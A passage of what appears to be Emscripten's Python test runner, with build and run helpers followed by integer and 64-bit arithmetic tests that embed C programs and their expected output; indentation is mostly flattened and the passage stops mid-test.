transform_args = ['--js-transform', "%s %s" % (PYTHON, transform_filename)]
Building.emcc(filename + '.o.ll', Settings.serialize() + self.emcc_args + transform_args + Building.COMPILER_TEST_OPTS, filename + '.o.js')
if post2: post2(filename + '.o.js')
# Build JavaScript code from source code
def build(self, src, dirname, filename, output_processor=None, main_file=None, additional_files=[], libraries=[], includes=[], build_ll_hook=None, extra_emscripten_args=[], post_build=None):
Building.pick_llvm_opts(3) # pick llvm opts here, so we include changes to Settings in the test case code
# Copy over necessary files for compiling the source
if main_file is None:
f = open(filename, 'w')
f.write(src)
f.close()
final_additional_files = []
for f in additional_files:
final_additional_files.append(os.path.join(dirname, os.path.basename(f)))
shutil.copyfile(f, final_additional_files[-1])
additional_files = final_additional_files
else:
# copy whole directory, and use a specific main .cpp file
# (rmtree() fails on Windows if the current working directory is inside the tree.)
if os.getcwd().startswith(os.path.abspath(dirname)):
os.chdir(os.path.join(dirname, '..'))
shutil.rmtree(dirname)
shutil.copytree(src, dirname)
shutil.move(os.path.join(dirname, main_file), filename)
# the additional files were copied; alter additional_files to point to their full paths now
additional_files = map(lambda f: os.path.join(dirname, f), additional_files)
os.chdir(self.get_dir())
# C++ => LLVM binary
for f in [filename] + additional_files:
try:
# Make sure we notice if compilation steps failed
os.remove(f + '.o')
except:
pass
args = [PYTHON, EMCC] + Building.COMPILER_TEST_OPTS + Settings.serialize() + \
['-I', dirname, '-I', os.path.join(dirname, 'include')] + \
map(lambda include: '-I' + include, includes) + \
['-c', f, '-o', f + '.o']
output = Popen(args, stdout=PIPE, stderr=self.stderr_redirect if not DEBUG else None).communicate()[0]
assert os.path.exists(f + '.o'), 'Source compilation error: ' + output
# Link all files
if len(additional_files) + len(libraries) > 0:
shutil.move(filename + '.o', filename + '.o.alone')
Building.link([filename + '.o.alone'] + map(lambda f: f + '.o', additional_files) + libraries,
filename + '.o')
if not os.path.exists(filename + '.o'):
print "Failed to link LLVM binaries:\n\n", output
raise Exception("Linkage error");
# Finalize
self.prep_ll_run(filename, filename + '.o', build_ll_hook=build_ll_hook)
# BC => JS
self.ll_to_js(filename, extra_emscripten_args, post_build)
if output_processor is not None:
output_processor(open(filename + '.o.js').read())
if self.emcc_args is not None and 'ASM_JS=1' in self.emcc_args:
if '--memory-init-file' in self.emcc_args:
memory_init_file = int(self.emcc_args[self.emcc_args.index('--memory-init-file')+1])
else:
memory_init_file = 0
if memory_init_file:
assert '/* memory initializer */' not in open(filename + '.o.js').read()
else:
assert 'memory initializer */' in open(filename + '.o.js').read()
def validate_asmjs(self, err):
    if 'uccessfully compiled asm.js code' in err and 'asm.js link error' not in err: # 'uccessfully' deliberately matches both "Successfully" and "successfully"
print >> sys.stderr, "[was asm.js'ified]"
elif 'asm.js' in err: # if no asm.js error, then not an odin build
raise Exception("did NOT asm.js'ify")
def run_generated_code(self, engine, filename, args=[], check_timeout=True, output_nicerizer=None):
stdout = os.path.join(self.get_dir(), 'stdout') # use files, as PIPE can get too full and hang us
stderr = os.path.join(self.get_dir(), 'stderr')
try:
cwd = os.getcwd()
except:
cwd = None
os.chdir(self.get_dir())
run_js(filename, engine, args, check_timeout, stdout=open(stdout, 'w'), stderr=open(stderr, 'w'))
if cwd is not None:
os.chdir(cwd)
out = open(stdout, 'r').read()
err = open(stderr, 'r').read()
if engine == SPIDERMONKEY_ENGINE and Settings.ASM_JS:
self.validate_asmjs(err)
if output_nicerizer:
ret = output_nicerizer(out, err)
else:
ret = out + err
assert 'strict warning:' not in ret, 'We should pass all strict mode checks: ' + ret
return ret
def build_native(self, filename, args=[]):
compiler = CLANG if filename.endswith('cpp') else CLANG_CC
process = Popen([compiler, '-O2', '-fno-math-errno', filename, '-o', filename+'.native'] + args, stdout=PIPE, stderr=self.stderr_redirect)
output = process.communicate()
    if process.returncode != 0:
print >> sys.stderr, "Building native executable with command '%s' failed with a return code %d!" % (' '.join([CLANG, '-O2', filename, '-o', filename+'.native']), process.returncode)
print "Output: " + output[0]
def run_native(self, filename, args):
    process = Popen([filename+'.native'] + args, stdout=PIPE)
    output = process.communicate()
    if process.returncode != 0:
print >> sys.stderr, "Running native executable with command '%s' failed with a return code %d!" % (' '.join([filename+'.native'] + args), process.returncode)
print "Output: " + output[0]
return output[0]
def assertIdentical(self, values, y):
if type(values) not in [list, tuple]: values = [values]
for x in values:
if x == y: return # success
raise Exception("Expected to have '%s' == '%s', diff:\n\n%s" % (
limit_size(values[0]), limit_size(y),
limit_size(''.join([a.rstrip()+'\n' for a in difflib.unified_diff(x.split('\n'), y.split('\n'), fromfile='expected', tofile='actual')]))
))
def assertContained(self, values, string, additional_info=''):
if type(values) not in [list, tuple]: values = [values]
for value in values:
if type(string) is not str: string = string()
if value in string: return # success
raise Exception("Expected to find '%s' in '%s', diff:\n\n%s\n%s" % (
limit_size(values[0]), limit_size(string),
limit_size(''.join([a.rstrip()+'\n' for a in difflib.unified_diff(values[0].split('\n'), string.split('\n'), fromfile='expected', tofile='actual')])),
additional_info
))
def assertNotContained(self, value, string):
if type(value) is not str: value = value() # lazy loading
if type(string) is not str: string = string()
if value in string:
raise Exception("Expected to NOT find '%s' in '%s', diff:\n\n%s" % (
limit_size(value), limit_size(string),
limit_size(''.join([a.rstrip()+'\n' for a in difflib.unified_diff(value.split('\n'), string.split('\n'), fromfile='expected', tofile='actual')]))
))
library_cache = {}
def get_build_dir(self):
ret = os.path.join(self.get_dir(), 'building')
if not os.path.exists(ret):
os.makedirs(ret)
return ret
def get_library(self, name, generated_libs, configure=['sh', './configure'], configure_args=[], make=['make'], make_args=['-j', '2'], cache=True, env_init={}, cache_name_extra='', native=False):
build_dir = self.get_build_dir()
output_dir = self.get_dir()
cache_name = name + cache_name_extra + (self.env.get('EMCC_LLVM_TARGET') or '')
if self.library_cache is not None:
if cache and self.library_cache.get(cache_name):
print >> sys.stderr, '<load %s from cache> ' % cache_name,
generated_libs = []
for basename, contents in self.library_cache[cache_name]:
bc_file = os.path.join(build_dir, cache_name + '_' + basename)
f = open(bc_file, 'wb')
f.write(contents)
f.close()
generated_libs.append(bc_file)
return generated_libs
print >> sys.stderr, '<building and saving %s into cache> ' % cache_name,
return Building.build_library(name, build_dir, output_dir, generated_libs, configure, configure_args, make, make_args, self.library_cache, cache_name,
copy_project=True, env_init=env_init, native=native)
def clear(self, in_curr=False):
for name in os.listdir(self.get_dir()):
try_delete(os.path.join(self.get_dir(), name) if not in_curr else name)
emcc_debug = os.environ.get('EMCC_DEBUG')
if emcc_debug and not in_curr:
for name in os.listdir(EMSCRIPTEN_TEMP_DIR):
try_delete(os.path.join(EMSCRIPTEN_TEMP_DIR, name))
# Shared test code between main suite and others
def setup_runtimelink_test(self):
header = r'''
struct point
{
int x, y;
};
'''
open(os.path.join(self.get_dir(), 'header.h'), 'w').write(header)
supp = r'''
#include <stdio.h>
#include "header.h"
extern void mainFunc(int x);
extern int mainInt;
void suppFunc(struct point &p) {
printf("supp: %d,%d\n", p.x, p.y);
mainFunc(p.x+p.y);
printf("supp see: %d\n", mainInt);
}
int suppInt = 76;
'''
supp_name = os.path.join(self.get_dir(), 'supp.cpp')
open(supp_name, 'w').write(supp)
main = r'''
#include <stdio.h>
#include "header.h"
extern void suppFunc(struct point &p);
extern int suppInt;
void mainFunc(int x) {
printf("main: %d\n", x);
}
int mainInt = 543;
int main( int argc, const char *argv[] ) {
struct point p = { 54, 2 };
suppFunc(p);
printf("main see: %d\nok.\n", suppInt);
#ifdef BROWSER
int result = suppInt;
REPORT_RESULT();
#endif
return 0;
}
'''
return (main, supp)
###################################################################################################
sys.argv = map(lambda arg: arg if not arg.startswith('test_') else 'default.' + arg, sys.argv)
test_modes = ['default', 'o1', 'o2', 'asm1', 'asm2', 'asm2g', 'asm2x86', 's_0_0', 's_0_1']
test_index = 0
if 'benchmark' not in str(sys.argv) and 'sanity' not in str(sys.argv) and 'browser' not in str(sys.argv):
# Tests
print "Running Emscripten tests..."
if len(sys.argv) == 2 and sys.argv[1].startswith('ALL.'):
ignore, test = sys.argv[1].split('.')
print 'Running all test modes on test "%s"' % test
sys.argv = [sys.argv[0]] + map(lambda mode: mode+'.'+test, test_modes)
class T(RunnerCore): # Short name, to make it more fun to use manually on the commandline
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None, output_processor=None, no_build=False, main_file=None, additional_files=[], js_engines=None, post_build=None, basename='src.cpp', libraries=[], includes=[], force_c=False, build_ll_hook=None, extra_emscripten_args=[]):
    if force_c or (main_file is not None and main_file[-2:] == '.c'):
basename = 'src.c'
Building.COMPILER = to_cc(Building.COMPILER)
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
if not no_build:
self.build(src, dirname, filename, main_file=main_file, additional_files=additional_files, libraries=libraries, includes=includes,
build_ll_hook=build_ll_hook, extra_emscripten_args=extra_emscripten_args, post_build=post_build)
# Run in both JavaScript engines, if optimizing - significant differences there (typed arrays)
if js_engines is None:
js_engines = JS_ENGINES
if Settings.USE_TYPED_ARRAYS:
js_engines = filter(lambda engine: engine != V8_ENGINE, js_engines) # V8 issue 1822
js_engines = filter(lambda engine: engine not in self.banned_js_engines, js_engines)
if len(js_engines) == 0: return self.skip('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in js_engines:
js_output = self.run_generated_code(engine, filename + '.o.js', args, output_nicerizer=output_nicerizer)
self.assertContained(expected_output, js_output.replace('\r\n', '\n'))
self.assertNotContained('ERROR', js_output)
#shutil.rmtree(dirname) # TODO: leave no trace in memory. But for now nice for debugging
if self.save_JS:
global test_index
self.hardcode_arguments(filename + '.o.js', args)
shutil.copyfile(filename + '.o.js', os.path.join(TEMP_DIR, str(test_index) + '.js'))
test_index += 1
# No building - just process an existing .ll file (or .bc, which we turn into .ll)
def do_ll_run(self, ll_file, expected_output=None, args=[], js_engines=None, output_nicerizer=None, post_build=None, force_recompile=False, build_ll_hook=None, extra_emscripten_args=[]):
filename = os.path.join(self.get_dir(), 'src.cpp')
self.prep_ll_run(filename, ll_file, force_recompile, build_ll_hook)
self.ll_to_js(filename, extra_emscripten_args, post_build)
self.do_run(None,
expected_output,
args,
no_build=True,
js_engines=js_engines,
output_nicerizer=output_nicerizer,
post_build=None) # post_build was already done in ll_to_js, this do_run call is just to test the output
def is_le32(self):
return not ('i386-pc-linux-gnu' in COMPILER_OPTS or self.env.get('EMCC_LLVM_TARGET') == 'i386-pc-linux-gnu')
def test_hello_world(self):
src = '''
#include <stdio.h>
int main()
{
printf("hello, world!\\n");
return 0;
}
'''
self.do_run(src, 'hello, world!')
assert 'EMSCRIPTEN_GENERATED_FUNCTIONS' not in open(self.in_dir('src.cpp.o.js')).read(), 'must not emit this unneeded internal thing'
def test_intvars(self):
    if self.emcc_args is None: return self.skip('needs ta2')
src = '''
#include <stdio.h>
int global = 20;
int *far;
int main()
{
int x = 5;
int y = x+17;
int z = (y-1)/2; // Should stay an integer after division!
y += 1;
int w = x*3+4;
int k = w < 15 ? 99 : 101;
far = &k;
*far += global;
int i = k > 100; // Should be an int, not a bool!
int j = i << 6;
j >>= 1;
j = j ^ 5;
int h = 1;
h |= 0;
int p = h;
p &= 0;
printf("*%d,%d,%d,%d,%d,%d,%d,%d,%d*\\n", x, y, z, w, k, i, j, h, p);
long hash = -1;
size_t perturb;
int ii = 0;
for (perturb = hash; ; perturb >>= 5) {
printf("%d:%d", ii, perturb);
ii++;
if (ii == 9) break;
printf(",");
}
printf("*\\n");
printf("*%.1d,%.2d*\\n", 56, 9);
// Fixed-point math on 64-bit ints. Tricky to support since we have no 64-bit shifts in JS
{
struct Fixed {
static int Mult(int a, int b) {
return ((long long)a * (long long)b) >> 16;
}
};
printf("fixed:%d\\n", Fixed::Mult(150000, 140000));
}
printf("*%ld*%p\\n", (long)21, &hash); // The %p should not enter an infinite loop!
return 0;
}
'''
self.do_run(src, '*5,23,10,19,121,1,37,1,0*\n0:-1,1:134217727,2:4194303,3:131071,4:4095,5:127,6:3,7:0,8:0*\n*56,09*\nfixed:320434\n*21*')
def test_sintvars(self):
Settings.CORRECT_SIGNS = 1 # Relevant to this test
src = '''
#include <stdio.h>
struct S {
char *match_start;
char *strstart;
};
int main()
{
struct S _s;
struct S *s = &_s;
unsigned short int sh;
s->match_start = (char*)32522;
s->strstart = (char*)(32780);
printf("*%d,%d,%d*\\n", (int)s->strstart, (int)s->match_start, (int)(s->strstart - s->match_start));
sh = s->strstart - s->match_start;
printf("*%d,%d*\\n", sh, sh>>7);
s->match_start = (char*)32999;
s->strstart = (char*)(32780);
printf("*%d,%d,%d*\\n", (int)s->strstart, (int)s->match_start, (int)(s->strstart - s->match_start));
sh = s->strstart - s->match_start;
printf("*%d,%d*\\n", sh, sh>>7);
}
'''
output = '*32780,32522,258*\n*258,2*\n*32780,32999,-219*\n*65317,510*'
Settings.CORRECT_OVERFLOWS = 0 # We should not need overflow correction to get this right
self.do_run(src, output, force_c=True)
def test_i64(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('i64 mode 1 requires ta2')
src = '''
#include <stdio.h>
int main()
{
long long a = 0x2b00505c10;
long long b = a >> 29;
long long c = a >> 32;
long long d = a >> 34;
printf("*%Ld,%Ld,%Ld,%Ld*\\n", a, b, c, d);
unsigned long long ua = 0x2b00505c10;
unsigned long long ub = ua >> 29;
unsigned long long uc = ua >> 32;
unsigned long long ud = ua >> 34;
printf("*%Ld,%Ld,%Ld,%Ld*\\n", ua, ub, uc, ud);
long long x = 0x0000def123450789ULL; // any bigger than this, and we
long long y = 0x00020ef123456089ULL; // start to run into the double precision limit!
printf("*%Ld,%Ld,%Ld,%Ld,%Ld*\\n", x, y, x | y, x & y, x ^ y, x >> 2, y << 2);
printf("*");
long long z = 13;
int n = 0;
while (z > 1) {
printf("%.2f,", (float)z); // these must be integers!
z = z >> 1;
n++;
}
printf("*%d*\\n", n);
return 0;
}
'''
self.do_run(src, '*184688860176,344,43,10*\n*184688860176,344,43,10*\n*245127260211081,579378795077769,808077213656969,16428841631881,791648372025088*\n*13.00,6.00,3.00,*3*')
src = r'''
#include <time.h>
#include <stdio.h>
#include <stdint.h>
int64_t returner1() { return 0x0000def123450789ULL; }
int64_t returner2(int test) {
while (test > 10) test /= 2; // confuse the compiler so it doesn't eliminate this function
return test > 5 ? 0x0000def123450123ULL : 0ULL;
}
void modifier1(int64_t t) {
t |= 12;
printf("m1: %Ld\n", t);
}
void modifier2(int64_t &t) {
t |= 12;
}
int truthy() {
int x = time(0);
while (x > 10) {
x |= 7;
x /= 2;
}
return x < 3;
}
struct IUB {
int c;
long long d;
};
IUB iub[] = {
{ 55, 17179869201 },
{ 122, 25769803837 },
};
int main(int argc, char **argv)
{
int64_t x1 = 0x1234def123450789ULL;
int64_t x2 = 0x1234def123450788ULL;
int64_t x3 = 0x1234def123450789ULL;
printf("*%Ld\n%d,%d,%d,%d,%d\n%d,%d,%d,%d,%d*\n", x1, x1==x2, x1<x2, x1<=x2, x1>x2, x1>=x2, // note: some rounding in the printing!
x1==x3, x1<x3, x1<=x3, x1>x3, x1>=x3);
printf("*%Ld*\n", returner1());
printf("*%Ld*\n", returner2(30));
uint64_t maxx = -1ULL;
printf("*%Lu*\n*%Lu*\n", maxx, maxx >> 5);
// Make sure params are not modified if they shouldn't be
int64_t t = 123;
modifier1(t);
printf("*%Ld*\n", t);
modifier2(t);
printf("*%Ld*\n", t);
// global structs with i64s
printf("*%d,%Ld*\n*%d,%Ld*\n", iub[0].c, iub[0].d, iub[1].c, iub[1].d);
// Bitshifts
{
int64_t a = -1;
int64_t b = a >> 29;
int64_t c = a >> 32;
int64_t d = a >> 34;
printf("*%Ld,%Ld,%Ld,%Ld*\n", a, b, c, d);
uint64_t ua = -1;
int64_t ub = ua >> 29;
int64_t uc = ua >> 32;
int64_t ud = ua >> 34;
printf("*%Ld,%Ld,%Ld,%Ld*\n", ua, ub, uc, ud);
}
// Nonconstant bitshifts
{
int64_t a = -1;
int64_t b = a >> (29 - argc + 1);
int64_t c = a >> (32 - argc + 1);
int64_t d = a >> (34 - argc + 1);
printf("*%Ld,%Ld,%Ld,%Ld*\n", a, b, c, d);
uint64_t ua = -1;
int64_t ub = ua >> (29 - argc + 1);
int64_t uc = ua >> (32 - argc + 1);
int64_t ud = ua >> (34 - argc + 1);
printf("*%Ld,%Ld,%Ld,%Ld*\n", ua, ub, uc, ud);
}
// Math mixtures with doubles
{
uint64_t a = 5;
double b = 6.8;
uint64_t c = a * b;
if (truthy()) printf("*%d,%d,%d*\n", (int)&a, (int)&b, (int)&c); // printing addresses prevents optimizations
printf("*prod:%llu*\n", c);
}
// Basic (rounded, for now) math. Just check compilation.
int64_t a = 0x1234def123450789ULL;
a--; if (truthy()) a--; // confuse optimizer
int64_t b = 0x1234000000450789ULL;
b++; if (truthy()) b--; // confuse optimizer
printf("*%Ld,%Ld,%Ld,%Ld*\n", (a+b)/5000, (a-b)/5000, (a*3)/5000, (a/5)/5000);
a -= 17; if (truthy()) a += 5; // confuse optimizer
b -= 17; if (truthy()) b += 121; // confuse optimizer
printf("*%Lx,%Lx,%Lx,%Lx*\n", b - a, b - a/2, b/2 - a, b - 20);
if (truthy()) a += 5/b; // confuse optimizer
if (truthy()) b += 121*(3+a/b); // confuse optimizer
printf("*%Lx,%Lx,%Lx,%Lx*\n", a - b, a - b/2, a/2 - b, a - 20);
return 0;
}
'''
self.do_run(src, '*1311918518731868041\n' +
'0,0,0,1,1\n' +
'1,0,1,0,1*\n' +
'*245127260211081*\n' +
'*245127260209443*\n' +
'*18446744073709551615*\n' +
'*576460752303423487*\n' +
'm1: 127\n' +
'*123*\n' +
'*127*\n' +
'*55,17179869201*\n' +
'*122,25769803837*\n' +
'*-1,-1,-1,-1*\n' +
'*-1,34359738367,4294967295,1073741823*\n' +
'*-1,-1,-1,-1*\n' +
'*-1,34359738367,4294967295,1073741823*\n' +
'*prod:34*\n' +
'*524718382041609,49025451137,787151111239120,52476740749274*\n' +
'*ffff210edd000002,91990876ea283be,f6e5210edcdd7c45,1234000000450765*\n' +
'*def122fffffe,91adef1232283bb,f6e66f78915d7c42,1234def123450763*\n')
src = r'''
#include <stdio.h>
#include <limits>
int main()
{
long long i,j,k;
i = 0;
          j = -1;
k = 1;
printf( "*\n" );
printf( "%s\n", i > j ? "Ok": "Fail" );
printf( "%s\n", k > i ? "Ok": "Fail" );
printf( "%s\n", k > j ? "Ok": "Fail" );
printf( "%s\n", i < j ? "Fail": "Ok" );
printf( "%s\n", k < i ? "Fail": "Ok" );
printf( "%s\n", k < j ? "Fail": "Ok" );
printf( "%s\n", (i-j) >= k ? "Ok": "Fail" );
printf( "%s\n", (i-j) <= k ? "Ok": "Fail" );
printf( "%s\n", i > std::numeric_limits<long long>::min() ? "Ok": "Fail" );
printf( "%s\n", i < std::numeric_limits<long long>::max() ? "Ok": "Fail" );
printf( "*\n" );
}
'''
self.do_run(src, '*\nOk\nOk\nOk\nOk\nOk\nOk\nOk\nOk\nOk\nOk\n*')
# stuff that also needs sign corrections
Settings.CORRECT_SIGNS = 1
src = r'''
#include <stdio.h>
#include <stdint.h>
int main()
{
// i32 vs i64
int32_t small = -1;
int64_t large = -1;
printf("*%d*\n", small == large);
small++;
printf("*%d*\n", small == large);
uint32_t usmall = -1;
uint64_t ularge = -1;
printf("*%d*\n", usmall == ularge);
return 0;
}
'''
self.do_run(src, '*1*\n*0*\n*0*\n')
def test_i64_b(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdio.h>
#include <sys/time.h>
typedef long long int64;
#define PRMJ_USEC_PER_SEC 1000000L
int main(int argc, char * argv[]) {
int64 sec = 1329409675 + argc;
int64 usec = 2329509675;
int64 mul = int64(sec) * PRMJ_USEC_PER_SEC;
int64 add = mul + int64(usec);
int add_low = add;
int add_high = add >> 32;
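          // with argc == 1, add = 1329412005509675; its low 32 bits (3663280683) exceed INT_MAX, hence the %u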
printf("*%lld,%lld,%u,%u*\n", mul, add, add_low, add_high);
int64 x = sec + (usec << 25);
x >>= argc*3;
printf("*%llu*\n", x);
return 0;
}
'''
self.do_run(src, '*1329409676000000,1329412005509675,3663280683,309527*\n*9770671914067409*\n')
def test_i64_cmp(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdio.h>
typedef long long int64;
bool compare(int64 val) {
return val == -12;
}
bool compare2(int64 val) {
return val < -12;
}
int main(int argc, char * argv[]) {
printf("*%d,%d,%d,%d,%d,%d*\n", argc, compare(argc-1-12), compare(1000+argc), compare2(argc-1-10), compare2(argc-1-14), compare2(argc+1000));
return 0;
}
'''
self.do_run(src, '*1,1,0,0,1,0*\n')
def test_i64_cmp2(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <inttypes.h>
#include <stdio.h>
typedef int32_t INT32;
typedef int64_t INT64;
typedef uint8_t UINT8;
void interface_clock_changed()
{
UINT8 m_divshift;
INT32 m_divisor;
//INT64 attos = m_attoseconds_per_cycle;
INT64 attos = 279365114840;
m_divshift = 0;
while (attos >= (1UL << 31))
{
m_divshift++;
printf("m_divshift is %i, on %Ld >?= %lu\n", m_divshift, attos, 1UL << 31);
attos >>= 1;
}
m_divisor = attos;
printf("m_divisor is %i\n",m_divisor);
}
int main() {
interface_clock_changed();
return 0;
}
'''
self.do_run(src, '''m_divshift is 1, on 279365114840 >?= 2147483648
m_divshift is 2, on 139682557420 >?= 2147483648
m_divshift is 3, on 69841278710 >?= 2147483648
m_divshift is 4, on 34920639355 >?= 2147483648
m_divshift is 5, on 17460319677 >?= 2147483648
m_divshift is 6, on 8730159838 >?= 2147483648
m_divshift is 7, on 4365079919 >?= 2147483648
m_divshift is 8, on 2182539959 >?= 2147483648
m_divisor is 1091269979
''')
def test_i64_double(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdio.h>
typedef long long int64;
#define JSDOUBLE_HI32_SIGNBIT 0x80000000
bool JSDOUBLE_IS_NEGZERO(double d)
{
union {
struct {
unsigned int lo, hi;
} s;
double d;
} x;
if (d != 0)
return false;
x.d = d;
return (x.s.hi & JSDOUBLE_HI32_SIGNBIT) != 0;
}
bool JSINT64_IS_NEGZERO(int64 l)
{
union {
int64 i;
double d;
} x;
if (l != 0)
return false;
x.i = l;
return x.d == -0;
}
int main(int argc, char * argv[]) {
printf("*%d,%d,%d,%d*\n", JSDOUBLE_IS_NEGZERO(0), JSDOUBLE_IS_NEGZERO(-0), JSDOUBLE_IS_NEGZERO(-1), JSDOUBLE_IS_NEGZERO(+1));
printf("*%d,%d,%d,%d*\n", JSINT64_IS_NEGZERO(0), JSINT64_IS_NEGZERO(-0), JSINT64_IS_NEGZERO(-1), JSINT64_IS_NEGZERO(+1));
return 0;
}
'''
self.do_run(src, '*0,0,0,0*\n*1,1,0,0*\n') # same as gcc
def test_i64_umul(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <inttypes.h>
#include <stdio.h>
typedef uint32_t UINT32;
typedef uint64_t UINT64;
int main() {
volatile UINT32 testu32a = 2375724032U;
UINT32 bigu32 = 0xffffffffU;
volatile UINT64 testu64a = 14746250828952703000U;
while ((UINT64)testu32a * (UINT64)bigu32 < testu64a) {
printf("testu64a is %llu\n", testu64a);
testu64a /= 2;
}
return 0;
}
'''
self.do_run(src, 'testu64a is 14746250828952703000\n')
def test_i64_precise(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <inttypes.h>
#include <stdio.h>
int main() {
uint64_t x = 0, y = 0;
for (int i = 0; i < 64; i++) {
x += 1ULL << i;
y += x;
x /= 3;
y *= 5;
printf("unsigned %d: %llu,%llu,%llu,%llu,%llu,%llu,%llu,%llu,%llu\n", i, x, y, x+y, x-y, x*y, y ? x/y : 0, x ? y/x : 0, y ? x%y : 0, x ? y%x : 0);
}
int64_t x2 = 0, y2 = 0;
for (int i = 0; i < 64; i++) {
x2 += 1LL << i;
y2 += x2;
x2 /= 3 * (i % 7 ? -1 : 1);
y2 *= 5 * (i % 2 ? -1 : 1);
printf("signed %d: %lld,%lld,%lld,%lld,%lld,%lld,%lld,%lld,%lld\n", i, x2, y2, x2+y2, x2-y2, x2*y2, y2 ? x2/y2 : 0, x2 ? y2/x2 : 0, y2 ? x2%y2 : 0, x2 ? y2%x2 : 0);
}
return 0;
}
'''
self.do_run(src, open(path_from_root('tests', 'i64_precise.txt')).read())
# Verify that even if we ask for precision, if it is not needed it is not included
Settings.PRECISE_I64_MATH = 1
src = '''
#include <inttypes.h>
#include <stdio.h>
int main(int argc, char **argv) {
uint64_t x = 2125299906845564, y = 1225891506842664;
if (argc == 12) {
x = x >> 1;
y = y >> 1;
}
x = x & 12ULL;
y = y | 12ULL;
x = x ^ y;
x <<= 2;
y >>= 3;
printf("*%llu, %llu*\\n", x, y);
}
'''
self.do_run(src, '*4903566027370624, 153236438355333*')
code = open(os.path.join(self.get_dir(), 'src.cpp.o.js')).read()
assert 'goog.math.Long' not in code, 'i64 precise math should not have been included if not actually used'
# But if we force it to be included, it is. First, a case where we don't need it
Settings.PRECISE_I64_MATH = 2
self.do_run(open(path_from_root('tests', 'hello_world.c')).read(), 'hello')
code = open(os.path.join(self.get_dir(), 'src.cpp.o.js')).read()
assert 'goog.math.Long' in code, 'i64 precise math should be included if forced'
# and now one where we do
self.do_run(r'''
#include <stdio.h>
int main( int argc, char ** argv )
{
unsigned long a = 0x60DD1695U;
unsigned long b = 0xCA8C4E7BU;
unsigned long long c = (unsigned long long)a * b;
printf( "c = %016llx\n", c );
return 0;
}
''', 'c = 4ca38a6bd2973f97')
def test_i64_llabs(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
Settings.PRECISE_I64_MATH = 2
self.do_run(r'''
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char ** argv) {
printf("%lld,%lld\n", llabs(-576460752303423489), llabs(576460752303423489));
return 0;
}
''', '576460752303423489,576460752303423489')
def test_i64_zextneg(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdint.h>
#include <stdio.h>
int main(int argc, char *argv[])
{
uint8_t byte = 0x80;
uint16_t two = byte;
uint32_t four = byte;
uint64_t eight = byte;
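          // widening an unsigned value zero-extends, so 0x80 stays 128 at every width (no sign extension)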
printf("value: %d,%d,%d,%lld.\n", byte, two, four, eight);
return 0;
}
'''
self.do_run(src, 'value: 128,128,128,128.')
def test_i64_7z(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdint.h>
#include <stdio.h>
uint64_t a, b;
int main(int argc, char *argv[])
{
a = argc;
b = argv[1][0];
printf("%d,%d\n", a, b);
if (a > a + b || a > a + b + 1) {
printf("one %lld, %lld", a, b);
return 0;
}
printf("zero %lld, %lld", a, b);
return 0;
}
'''
self.do_run(src, 'zero 2, 104', ['hallo'])
def test_i64_i16(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdint.h>
#include <stdio.h>
int main(int argc, char ** argv){
int y=-133;
int64_t x= ((int64_t)((short)(y)))*(100 + argc);
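          // (short)(-133) is still -133, so the widened 64-bit product -133 * (100 + argc) must be negative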
if(x>0)
printf(">0\n");
else
printf("<=0\n");
}
'''
self.do_run(src, '<=0')
def test_i64_qdouble(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdio.h>
typedef long long qint64; /* 64 bit signed */
typedef double qreal;
int main(int argc, char **argv)
{
qreal c = 111;
qint64 d = -111 + (argc - 1);
c += d;
if (c < -1 || c > 1)
{
printf("Failed!\n");
}
else
{
printf("Succeeded!\n");
}
};
'''
self.do_run(src, 'Succeeded!')
def test_i64_varargs(self):
if Settings.USE_TYPED_ARRAYS != 2: return self.skip('full i64 stuff only in ta2')
src = r'''
#include <stdio.h>
#include <stdint.h>
#include <stdarg.h>
int64_t ccv_cache_generate_signature(char *msg, int len, int64_t sig_start, ...) {
if (sig_start < 10123)
printf("%s\n", msg+len);
va_list v;
va_start(v, sig_start);
if (sig_start > 1413)
printf("%d\n", va_arg(v, int));
else
printf("nada\n");
va_end(v);
return len*sig_start*(msg[0]+1);
}
int main(int argc, char **argv)
{
for (int i = 0; i < argc; i++) {
int64_t x;
if (i % 123123 == 0)
x = ccv_cache_generate_signature(argv[i], i+2, (int64_t)argc*argc, 54.111);
else
x = ccv_cache_generate_signature(argv[i], i+2, (int64_t)argc*argc, 13);
printf("%lld\n", x);
}
};
'''
self.do_run(src, '''in/this.program
nada
1536
a
nada
5760
fl
nada
6592
sdfasdfasdf
nada
7840
''', 'waka fleefl asdfasdfasdfasdf'.split(' '))
def test_i32_mul_precise(self):
if self.emcc_args == None: return self.skip('needs ta2')
src = r'''
#include <stdio.h>
int main(int argc, char **argv) {
unsigned long d1 = 0x847c9b5d;
unsigned long q = 0x549530e1;
if (argc > 1000) { q += argc; d1 -= argc; } // confuse optimizer
printf("%lu\n", d1*q);
return 0;
}
'''
self.do_run(src, '3217489085')
def test_i32_mul_semiprecise(self):
if Settings.ASM_JS: return self.skip('asm is always fully precise')
Settings.PRECISE_I32_MUL = 0 # we want semiprecise here
src = r'''
#include <stdio.h>
typedef unsigned int uint;
// from cube2, zlib licensed
#define N (624)
#define M (397)
#define K (0x9908B0DFU)
static uint state[N];
static int next = N;
void seedMT(uint seed)
{
state[0] = seed;
